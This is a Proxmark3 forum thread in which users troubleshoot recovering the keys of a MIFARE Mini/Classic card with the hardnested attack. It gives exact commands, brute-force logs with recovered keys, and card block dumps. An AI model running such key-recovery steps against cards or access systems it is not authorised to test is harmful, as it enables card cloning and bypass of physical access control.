Research, development and trades concerning the powerful Proxmark3 device.
Remember; sharing is caring. Bring something back to the community.
"Learn the tools of the trade the hard way." +Fravia
You are not logged in.
Time changes and with it the technology
Proxmark3 @ discord
Users of this forum, please be aware that information stored on this site is not private.
Pages: 1
Long time since I don't work on RFID,
please give me some help to put me back on the right way:
I use PM3 with the Automatic Mifare crack Script.
The script works fine with the old card but it doesn't work with the new one.
old one: nxp Mifare Classic 1k/Mifare Plus(4 byte UID) 2K SL1 (ATQA=0004, SAK=08)
new one: nxp Mifare Mini (ATQA=0004, SAK=09)
Is it there an attack for this tag?
note1: I can't phisically sniff between the reader and the tag
note2: my current loaded version of PM3 firmware is old.
Offline
O my, Gaucho, now that was long time indeed. Welcome back! I'm happy to see you here.
You need to read up on whats called hardnested attack which is the attack that works against a Mifare classic tag which has improved prng and no ACK-bug.
You find it implemented in the latest source. compile/flash and enjoy the enhancements.
You also find a new repo based on your old PM3Gui. Feel free to do your magic
Online
Thank you Roel, I will try it and I will give a feedback
Offline
haha, no, sorry, I'm not Roel...
but I became admin
Online
oh! Ciao Iceman, nice to meet you again.
Sorry I read "Administrator" and I didn't read "iceman", i'm becoming old and dumb.
Offline
welcome back gaucho
Offline
Ciao marshmellow, nice to see you too.
I downloaded the compiled version from this thread: http://www.proxmark.org/forum/viewtopic.php?id=3975
I selected last official version in the Google drive folder.
I had some problems updating with fullimage. I had to boot some times with button pressed, then installed the old working version, then installed the bootloader of the new version, then installed the fullimage.
Finally it seems correctly updated!
I found on github this: https://github.com/Proxmark/Gaucho-GUI
the strange fact is that in my local folder I have another version of the tool developed in vb.net with a more updated xml configuration file.
Where is the updated xml file located? on github I see an empty xml file
If you don't have it, we can think to use my old one and start from it in order to update it? where is the thread about this discussion?
I tried the hardnested attack.
I get the following, but may be I didn't understood how to use it.
proxmark3> hf mf hardnested 0 A A0A1A2A3A4A5 50 B w s
--target block no: 50, target key type:B, known target key: 0x000000000000 (not set), file action: write, Slow: Yes, Tests: 0
time | #nonces | Activity | expected to brute force
| | | #states | time
------------------------------------------------------------------------------------------------------
0 | 0 | Start using 4 threads and AVX SIMD core | |
0 | 0 | Brute force benchmark: 249 million (2^27.9) keys/s | 140737488355328 | 7d
2 | 0 | Using 235 precalculated bitflip state tables | 140737488355328 | 7d
#db# AcquireNonces: Can't select card (UID)
#db# AcquireNonces: Can't select card (UID)
6 | 0 | Writing acquired nonces to binary file nonces.bin | 140737488355328 | 7d
7 | 112 | Apply bit flip properties | 616831057920 | 41min
8 | 223 | Apply bit flip properties | 304204513280 | 20min
#db# AcquireNonces: Can't select card (UID)
9 | 334 | Apply bit flip properties | 118500147200 | 8min
#db# AcquireNonces: Auth2 error len=1
#db# AcquireNonces: Can't select card (UID)
11 | 445 | Apply bit flip properties | 90291929088 | 6min
12 | 555 | Apply bit flip properties | 45307748352 | 3min
13 | 666 | Apply bit flip properties | 45307748352 | 3min
14 | 776 | Apply bit flip properties | 45307748352 | 3min
#db# AcquireNonces: Can't select card (ALL)
#db# Authentication failed. Card timeout.
#db# AcquireNonces: Auth1 error
15 | 885 | Apply bit flip properties | 20603797504 | 83s
16 | 995 | Apply bit flip properties | 20603797504 | 83s
17 | 1104 | Apply bit flip properties | 20603797504 | 83s
21 | 1213 | Apply Sum property. Sum(a0) = 120 | 2457400832 | 10s
22 | 1324 | Apply bit flip properties | 2457400832 | 10s
#db# Authentication failed. Card timeout.
#db# AcquireNonces: Auth1 error
24 | 1435 | Apply bit flip properties | 2457400832 | 10s
#db# AcquireNonces: Can't select card (UID)
25 | 1543 | Apply bit flip properties | 2457400832 | 10s
25 | 1543 | (Ignoring Sum(a8) properties) | 2457400832 | 10s
30 | 1543 | Starting brute force... | 2457400832 | 10s
41 | 1543 | Brute force phase completed. Key found: d01afeeb890a | 0 | 0s
NOTE1: the found key is not usable to read block 50
NOTE2: I tried to use the key A A0A1A2A3A4A5 to read block 0 but I get authentication error. I think they changed the default password to read block 0. Is it possible? I understood that hardnested hattack works only if you know at least one key. Correct?
Offline
Regarding the Gaucho-GUI, this is the new repo which is to be using c# instead of the vb.net. It is different than yours, the settings.xml is now called: pm3commands.xml https://github.com/Proxmark/Gaucho-GUI/ … mmands.xml
The project is quite stale but uses your original ideas.
Regarding hardnested,
It needs one known key to work and maybe the accessrights is not right for the found key to work?
Online
Regarding hardnested,
It needs one known key to work and maybe the accessrights is not right for the found key to work?
sorry, i was wrong: the block0 can be correctly read with password a0a1a2a3a4a5
so, how would you proceed for this exploit?
did I understood fine the usage? If i know key A of block0 and i want key B of block 50 i should use the following command:
hf mf hardnested 0 A A0A1A2A3A4A5 50 B w s
p.s. offtopic: the xml in the github is almost empty, while last xml file prepared by asper is much more complete, as you can see in the annexed file: tool+xml
Last edited by gaucho (2017-09-26 14:43:08)
Offline
Gaucho-Repo is setup but only 0xFFFF did some additions. It was suppose to bring order of the zip-files with your original sourcecode floating around on internet. So yes, the pm3commands.xml needs to be filled with data Feel free to contribute.
The hardnested is called the way you did.
hf mf hardnested 0 A A0A1A2A3A4A5 50 B
you can add the 's' - slow parameter if you need it. You don't need 'w'
The attacked worked for you but the KEY B might not be allowed to r/w to the block-sector.
I'm not sure what you mean with "proceed for this exploit"...
You will do same as for all Mifare classic cards. Get all keys (both A/B) dump the card, ... you know, usual stuff
Online
The attacked worked for you but the KEY B might not be allowed to r/w to the block-sector.
ok, I corrected previous post: the key for block 0 is a0a1a2a3a4a5 and it works, while found passkey for block 50 (A and B) does not allows to read the data. This is strange cause on the old tag the block50 can be wrote... I could try with other blocks...
proxmark3> hf mf hardnested 0 A a0a1a2a3a4a5 50 A w s
--target block no: 50, target key type:A, known target key: 0x000000000000 (not set), file action: write, Slow: Yes, Tests: 0
time | #nonces | Activity | expected to brute force
| | | #states | time
------------------------------------------------------------------------------------------------------
0 | 0 | Start using 4 threads and AVX SIMD core | |
0 | 0 | Brute force benchmark: 164 million (2^27.3) keys/s | 140737488355328 | 10d
7 | 0 | Using 235 precalculated bitflip state tables | 140737488355328 | 10d
12 | 0 | Writing acquired nonces to binary file nonces.bin | 140737488355328 | 10d
#db# AcquireNonces: Can't select card (UID)
13 | 112 | Apply bit flip properties | 362125426688 | 37min
14 | 224 | Apply bit flip properties | 342383001600 | 35min
15 | 336 | Apply bit flip properties | 231093567488 | 24min
16 | 448 | Apply bit flip properties | 117451595776 | 12min
#db# AcquireNonces: Can't select card (UID)
17 | 559 | Apply bit flip properties | 86514655232 | 9min
18 | 670 | Apply bit flip properties | 81467498496 | 8min
20 | 781 | Apply bit flip properties | 59585695744 | 6min
21 | 891 | Apply bit flip properties | 56696315904 | 6min
22 | 1000 | Apply bit flip properties | 56696315904 | 6min
#db# Authentication failed. Error card response.
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
#db# AcquireNonces: Auth2 error len=1
#db# AcquireNonces: Can't select card (UID)
23 | 1111 | Apply bit flip properties | 41825263616 | 4min
24 | 1221 | Apply bit flip properties | 41825263616 | 4min
#db# Authentication failed. Error card response.
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
25 | 1330 | Apply bit flip properties | 39939891200 | 4min
30 | 1439 | Apply Sum property. Sum(a0) = 128 | 10160185344 | 62s
33 | 1550 | Apply bit flip properties | 10160185344 | 62s
37 | 1658 | Apply bit flip properties | 5059532800 | 31s
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
#db# Authentication failed. Error card response.
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
40 | 1766 | Apply bit flip properties | 5059532800 | 31s
42 | 1874 | Apply bit flip properties | 5059532800 | 31s
45 | 1981 | Apply bit flip properties | 4719508480 | 29s
45 | 1981 | (Ignoring Sum(a8) properties) | 4719508480 | 29s
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
51 | 1981 | Starting brute force... | 4719508480 | 29s
114 | 1981 | Brute force phase completed. Key found: 5c8ff9990da2 | 0 | 0s
Last edited by gaucho (2017-09-26 14:48:51)
Offline
try block 51 and see if you get the same key? You should of course..
Online
update:
I can read only the first 5 blocks, while block 5 can not be read even if the key should be a0a1a2a3a4a5
8E7F48FF46890400C840002000000015
A5000938093809380938000500050005
00050005000500050005000500050005
00000000000061E789C1000000000000
8805D882000485220000030002051979
i should find in my hard disk the datasheet where the memory structure is defined, in order to check the write permissions
Offline
try block 51 and see if you get the same key? You should of course..
yes, the key A for block 51 is the same of block 50.
Offline
Which command do you use to read with that key?
Online
Which command do you use to read with that key?
I'm using another reader, an SL500.
for the access bits decoding I will use this tool : http://www.proxmark.org/forum/viewtopic.php?id=1408
Last edited by gaucho (2017-09-26 15:44:26)
Offline
Why don't you use the proxmark3 to read the block50 with that key B?
Online
ok,it seems to be a matter of write permissions.
with key a0a1a2a3a4a5 i can read the following blocks:
0 8E7F48FF46890400C840002000000015
1 A5000938093809380938000500050005
2 00050005000500050005000500050005
3 00000000000061E789C1000000000000
4 8805D882000485220000030002051979
5
6
7 0000000000001E11EE5A000000000000
8
9
10
11 0000000000000F00FF7A000000000000
12
13
14
15 0000000000000F00FFDD000000000000
16
17
18
19 0000000000004B44BB5A000000000000
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
I tried to read block 51 with Keys obtained with the hardnested attack without success.
Offline
Why don't you use the proxmark3 to read the block50 with that key B?
I did it, i get the same result:
proxmark3> hf 14a reader
UID : 8e 7f 48 ff
ATQA : 00 04
SAK : 09 [2]
TYPE : NXP MIFARE Mini 0.3k
proprietary non iso14443-4 card found, RATS not supported
Answers to chinese magic backdoor commands: NO
proxmark3> hf mf rdbl 50 B d01afeeb890a
--block no:50, key type:B, key:d0 1a fe eb 89 0a
#db# Cmd Error: 04
#db# Read block error
#db# READ BLOCK FINISHED
isOk:00
proxmark3> hf mf rdbl 51 B d01afeeb890a
--block no:51, key type:B, key:d0 1a fe eb 89 0a
#db# Cmd Error: 04
#db# Read block error
#db# READ BLOCK FINISHED
isOk:00
proxmark3> hf mf rdbl 52 B d01afeeb890a
--block no:52, key type:B, key:d0 1a fe eb 89 0a
#db# Cmd Error: 04
#db# Read block error
#db# READ BLOCK FINISHED
isOk:00
proxmark3> hf mf rdbl 49 B d01afeeb890a
--block no:49, key type:B, key:d0 1a fe eb 89 0a
#db# Cmd Error: 04
#db# Read block error
#db# READ BLOCK FINISHED
isOk:00
proxmark3>
Offline
Does the accessbits calcuator say the KEY B should be able to R/W on block 50?
Lets see:
block 50
A == 5c8ff9990da2
B == d01afeeb890a
hf mf rdbl 52 A 5c8ff9990da2
hf mf rdbl 52 B d01afeeb890a
Online
Does the accessbits calcuator say the KEY B should be able to R/W on block 50?
Lets see:
block 50
A == 5c8ff9990da2
B == d01afeeb890ahf mf rdbl 52 A 5c8ff9990da2 hf mf rdbl 52 B d01afeeb890a
Access bits for block 50 should be on block 51. Do you agree?
I tried to read block 51 without success.
I don't know how to proceed.
I suspect I miss something
Offline
I may be nuts, but if your card is a mifare mini it only has 20 blocks...
Offline
I may be nuts, but if your card is a mifare mini it only has 20 blocks...
This have sense.
May be the reader uses two differents approaches depending on the key that it find. In one case(mifare1k) it writes block 50 and in another case (mifare mini) it writes block xxx (<20)
Are we sure mifare mini have only 20 blocks?
Edit: yes, http://www.orangetags.com/rfid-chip-datasheet/nxp-rfid-chip-datasheet/mifare/mifare-mini-datasheet/
Last edited by gaucho (2017-09-26 18:30:32)
Offline
Yep. 320 bytes, 5 sectors, 20 blocks.
Offline
Is it there a script like the autopwn to get all the keys with hardnested attack?
Offline
It's funny that the bruteforce finds also a key for a inexistent block. It's something related to chuck Norris
Offline
Doesn't make sense...
hardnested shouldnt be able to gather nonces against a non-existent block.
so, the card you have attacked must have had a block 50.
The Mini, is as stated only 5sectors ( 20 blocks ), which is why your reads to a block 50, 51 fails majorly... All normal now.
your read of the individual blocks should success until block19 (zerobased) all normal.
The found keys, try them against your sectors..
hf mf rdsc 0 a 5c8ff9990da2
hf mf rdsc 1 a 5c8ff9990da2
hf mf rdsc 2 a 5c8ff9990da2
hf mf rdsc 3 a 5c8ff9990da2
hf mf rdsc 4 a 5c8ff9990da2
There is some un-released scripts which makes hardnested behave like the nested...
Online
Welcome back, Gaucho!
Idea: Mifare mini uses 5 bit only for block addressing, I.e. block 50 = block 18? Or your card isn't a Mifare mini...
Offline
...a wrong block read/write must respond with a NACK of sorts if following Mifare Classic protocol. ie geniune tag. But clones like fudan etc could be more tolerant with those...
Online
Pages: 1